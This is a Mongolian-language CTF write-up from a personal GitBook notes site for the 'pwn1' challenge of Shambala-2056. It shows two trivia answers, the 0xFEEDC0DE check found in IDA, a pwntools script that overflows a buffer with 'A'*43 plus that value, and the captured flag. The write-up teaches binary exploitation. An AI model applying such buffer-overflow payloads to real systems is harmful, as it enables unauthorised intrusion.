fg0x0's notes
  • 👀Introduction
    • 🏴‍☠️About me
  • 👾offensive-security
    • 🐲OSCP
      • 🛡️Active Directory ( OSCP )
    • ⛓️OSEP
    • 🕸️OSWE
    • 🌌PG-Practice
      • 🏴‍☠️Warm UP
        • 🐧ClamAV
        • 🪟Algernon
        • 🪟Helpdesk
      • 🏴‍☠️Get to Work
        • 🪟Hutch
        • 🪟Jacko
        • 🪟Shenzi
        • 🪟Slort
        • 🐧Postfish
        • 🐧Pelican
        • 🐧Quackerjack
        • 🐧Snookums
        • 🐧Sorcerer
        • 🐧Walla
        • 🐧ZenPhoto
        • 🐧Zino
      • 🏴‍☠️Try Harder
        • 🐧Peppo
        • 🐧Sirol
      • 🏴‍☠️Retired Play Machines
  • 🚩Red Team
    • ☢️Active Directory Exploitation
      • ⚔️Domain Enumeration
      • ⚔️Local Privilege Escalation
    • 👿Red Teaming Zero to Hero
    • 👿Red Teaming All The Things
    • 🕸️Web Exploitation
      • ⚔️XSS (Cross-Site Scripting)
      • ⚔️Remote File Inclusion
      • ⚔️HTML smuggling
    • 💀Binary Exploitation
      • ⚔️Buffer Overflow
      • ⚔️Return Oriented Programming ( ROP )
      • ⚔️Binary Security
      • ⚔️Format String Vulnerability
      • ⚔️Registers
    • ☠️Exploit Development
      • ⚔️Macro Shellcode
      • ⚔️Payloads
  • 🏳️Blue Team
    • 🔍Digital Forensics
    • 🔐Cryptography & Math
      • ⚔️OpenSSL
    • ⏪Reverse Engineering
  • 🏴‍☠️ctf
    • 🏇Haruul Zangi
      • 🏴HZ-2018
        • ⚔️Final-Shao Kahn
      • 🏴HZ-2019
        • ⚔️Final-Уртасгасан-Хээээээээээээээээш
        • ⚔️Final-Skywalker-sage-info
        • ⚔️Round-1-Very Secure LDAP
        • ⚔️Round-1-Web Warmup
      • 🏴HZ-2020
        • ⚔️Round-1-websploit1
        • ⚔️Round-1-websploit2
        • ⚔️Round-1-websploit3
      • 🏴HZ-2021
        • ⚔️Final-Screenshot 1,2
        • ⚔️Final-Orb
      • 🏴HZ-2022
        • ⚔️HZ-2022-Final-You Have Been Hacked
        • ⚔️HZ-2022-Final-Breaking News
        • ⚔️HZ-2022-Final-Todo
        • ⚔️HZ-2022-Final-Subway Surfers
        • ⚔️HZ-2022-Round-2-Spike-Boom-!!!
      • 🏴HZ-2023
        • 👻Round-1
        • 👻Round-2
        • 👻Round-3
          • 🦆Ducky Notes
          • 🚋Aylagch
          • 🔻Web Downchecker
          • 🔑Password Manager
      • 🐣HZ-U18-2023
        • 🔍Forensics
        • ☄️Trivia
        • 🕸️Web
        • 🔢Crypto
        • 🌏Misc
      • 🏴HZ-2024
        • Round-1
          • M4th
        • Round-2
          • Enigma
        • Final-Round
          • 💀heavy one ( forensics )
    • 🏴‍☠️Other CTF
      • 🏜️Shambala-2056
        • 🇦🇷Argentina-PWN (pwn1)
        • 🇪🇬Egypt-Forensics (spectre)
      • 🏴‍☠️SICT CTF
        • 🎮null
      • 🌏Asian Cyber Security Challenge
        • 🌏ACSC ( 2023 )
          • 🏴‍☠️Merkle Hellman ( Cryptography )
          • 🏴‍☠️easySSTI ( Web Exploitation )
          • 🏴‍☠️Hardware is not so hard
  • 🧊HackTheBox
    • 🪟Windows Machine
      • 🤕Support
      • ❌Escape
      • ✈️Flight
      • ☢️Active
    • 🐧Linux Machine
    • ☠️Other Platform Machines
      • ⚔️HMV-Alzheimer
      • ⚔️HMV-BaseME
      • ⚔️HMV-doc
    • Web Exploitation
      • 👽Flask SSTI
        • Templated
        • baby interdimensional internet
        • 👽baby todo or not todo
        • Slippy ( Jinja2 )
      • Injection
        • 👽Phonebook ( LDAP Injection )
        • sanitize ( SQL Injection )
        • Weather app ( SQL Injection )
        • Intergalactic Post ( php filter SQLi )
        • C.O.P ( SQL injection + Revshell )
      • 💥Prototype Pollution
        • ☠️baby breaking grad
      • 😵‍💫insecure deserialization
        • 👽baby website rick ( insecure deserialization )
      • XSS
        • 👽Full Stack Conf (Cross-Site Scripting)
        • AbuseHumandb ( XSS Puppeteer )
        • Kryptos Support ( XSS+IDOR )
        • Felonious Forums ( XSS, Cache Poison, Directory Traversal )
      • 👾Symfony
        • 💀baby bonechewercon ( Symfony )
      • 👥XXE
        • 🤙baby WAFfles order
      • Ping submit hiideg
        • Looking Glass ( Ping )
      • RCE
        • LoveTok ( RCE )
        • Neonify ( RCE )
        • Amidst Us ( image+RCE )
        • Letter Despair ( PHP + RCE )
        • Debugger Unchained ( SQLi+RCE )
      • LFI
        • toxic ( LFI )
      • File Upload
        • petpet rcbee ( file upload )
      • URL submit hiideg
        • baby CachedView ( URL submit hiideg )
      • Invoice ilgeedeg
        • Blinker Fluids
      • HTTP2 smuggling
        • PhishTale ( HTTP2 smuggling, Twig N-Day )
    • Forensics
  • 💀Synack Red Team
    • ☠️DC-1 ( kh )
    • ☠️DC-2 ( kh )
    • ☠️DC-3 ( kh )
  • dursamj
Powered by GitBook
On this page
  1. ctf
  2. Other CTF
  3. Shambala-2056

Argentina-PWN (pwn1)

Shambala-2056 урлаг технологийн наадам дээрх бөх барилдаан буюу CTF тэмцээний даалгавруудын талаар оруулж байна

PreviousShambala-2056NextEgypt-Forensics (spectre)

Last updated 2 years ago

Энэхүү pwn төрлийн даалгавар нь Аргентин улс дээр байршиж байсан. Хэрвээ та бүхэн татаж туршиж үзэхийг хүсвэл доор холбоосыг нь үлдээлээ

Хамгийн эхний validation бол 1. Eriin guvan naadmiin hamgiin hurdan ni?

Энэхүү асуултын хариулт нь Hurdanm0ri esvel num sum ch yumuu

Энэ хэсгийг кодоор бичиж илгээхдээ sendline ашиглаж болно

io.sendline(bytes("Hurdanm0ri esvel num sum ch yumuu",'utf-8'))
data=io.recv()

Хэрвээ энэхүү үйлдэл нь буруу байвал bishiiim bn shu гэж хэвлэнэ зөв байвал дараагийн асуултруу шилжинэ

2. chinggis haani dagavar huuhdiin ehneriin eejiin ner? гэсэн асуултад za bi uuuuuruuuuuuuu ch medkue гэж хариулвал зөв гэж үзнэ

Буруу хариулвал bishiiim bn shu гэж хэвлээд зөв байвал дараагийн асуулт буюу tegvel minii password yuiin?-руу очно

Одоо бидэнд нууц үгийг олох шаардлага үүсэж байгаа юм. Энэхүү кодыг анализ хийж үзвэл. cmp --> compare хийж байгаа хэсэгт 0FEEDC0DEh гэж бичсэн байгааг харж болно

Энэхүү утгаа хэрвээ серверлүү зөв дамжуулвал бид серверээс амжилттай флагаа авах боломж бүрдэнэ. Энэхүү үйлдлүүдийг автоматжуулаад скрипт болгоод үзье

#!/usr/bin/env python3
from pwn import *
#host='54.227.92.4'
#port=3001
#io=remote(host,port)
io=process("./pwn1")
data=io.recvline()
print(data)
io.sendline(bytes("Hurdanm0ri esvel num sum ch yumuu",'utf-8'))
data=io.recv()
print(data)
io.sendline(bytes("za bi uuuuruuuuuu ch medkue",'utf-8'))
data=io.recv()
print(data)
io.sendline(b"A"*43+b"\xde\xc0\xed\xfe")
data=io.recv()
print(data)

Код дээрээ яагаад "A"*43 гэсэн бэ гэхээр массивын утгаас харахад бүх зүйл тодорхой болно

shambala2056{n0_pwn_n0_funN!_albania}

🏴‍☠️
🏴‍☠️
🏜️
🇦🇷
15KB
pwn1
pwn даалгаврын өгөгдсөн файл
Disassemblerwith IDA pro